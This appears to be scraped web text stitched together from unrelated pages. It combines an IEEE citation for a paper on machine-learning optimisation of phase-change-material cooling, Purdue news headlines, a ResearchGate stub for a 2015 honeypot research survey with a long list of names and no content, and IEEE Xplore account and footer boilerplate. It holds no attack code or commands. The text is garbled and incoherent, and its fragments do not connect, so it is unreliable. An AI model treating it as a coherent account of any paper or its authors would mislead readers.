Optimization of an Embedded Phase Change Material Cooling Strategy Using Machine Learning 2021 20th IEEE Intersociety Conference on Thermal and Thermomechanical Phenomena in Electronic Systems (iTherm) DOI: https://doi.org/10.1109/ITherm51669.2021.9503128

Media contact: Brian Huchel

Note to journalists:

A video link is available to media who have an Associated Press subscription.

Purdue Computes News

Partnerships with Malaysian universities focus on AI, data science

September 11, 2024

Latest in AI research: Improving life and wellness through innovation

July 31, 2024

Purdue, Dominican Republic enter agreement to drive semiconductor growth

July 2, 2024

Purdue and leading microelectronics industry association SEMI partner to bolster semiconductor education

June 26, 2024

A survey of honeypot research: Trends and opportunities

• December 2015
• Conference: 2015 10th International Conference for Internet Technology and Secured Transactions (ICITST)
• This person is not on ResearchGate, or hasn't claimed this research yet.

• University of South Africa

Discover the world's research

• 25+ million members
• 160+ million publication pages
• 2.3+ billion citations

No full-text available

To read the full-text of this research, you can request a copy directly from the authors.

• Javier Franco

• Jason M. Pittman
• Shaho Alaee

• Kyle Hoffpauir
• Nathan Markle
• Laurent Njilla

• Swastik Brahma
• Charles Kamhoua

• Ayman A. Abdel-Hamid

• Mark Bilinski

• Preitypriya

• Eka Budiarto
• Canny Siska Georgina

• M. Ryan Fadholi
• Wenni Syafitri
• Sudesh Pahal
• Preity Priya

• Yasser Morgan

• Hideya Ochiai
• PROCESS SAF ENVIRON

• Shuang-Hua Yang

• Georgios Efstathopoulos

• Cameron Meadows
• Arif Nursetyo

• Norbert Ádám

• Jiaxuan Han
• Jiayong Liu

• Sonia Cromp

• Ghiffari Adhe Permana
• Muhammad Hasbi
• Muhammed Sadık KARABAY

• COMPUT NETW

• Frank Jiang
• Mingcan Cen

• Ádám Balogh

• Mahar Faiqurahman
• S. Syaifuddin
• EXPERT SYST APPL
• Jassim Happa

• Alastair Janse van Rensburg

• Swati C. Tawalare

• Kanchan M. Pimple

• P. Y. V. N. Dileep Kumar

• Shivani G. Dharmale
• Snehal A. Gomase
• V. Harikrishnan
• H. S. Sanket
• K. S. Sahazeer

• Aditya Kamparia

• Rajitha Bhargavi Movva

• Hamzeh Ali Teymorzade
• Nandi O. Leslie

• Xiaochun Cheng
• Matus Mihok
• Lianyang Li
• Matthew L Bringer

• Lalande Jean-François

• B. Scottberg

• Cristine Hoepers
• Klaus Steding-Jessen

• L. Spitzner
• W. W. Martin
• Iyatiti Mokube
• Michele Adams

• Yi-Min Wang
• E Kaspersky
• H V Rajendram
• Recruit researchers
• Join for free
• Login Email Tip: Most researchers use their institutional email address as their ResearchGate login Password Forgot password? Keep me logged in Log in or Continue with Google Welcome back! Please log in. Email · Hint Tip: Most researchers use their institutional email address as their ResearchGate login Password Forgot password? Keep me logged in Log in or Continue with Google No account? Sign up

IEEE Account

• Change Username/Password
• Update Address

Purchase Details

• Payment Options
• Order History
• View Purchased Documents

Profile Information

• Communications Preferences
• Profession and Education
• Technical Interests
• US & Canada: +1 800 678 4333
• Worldwide: +1 732 981 0060
• Contact & Support
• About IEEE Xplore
• Accessibility
• Terms of Use
• Nondiscrimination Policy
• Privacy & Opting Out of Cookies

A not-for-profit organization, IEEE is the world's largest technical professional organization dedicated to advancing technology for the benefit of humanity. © Copyright 2024 IEEE - All rights reserved. Use of this web site signifies your agreement to the terms and conditions.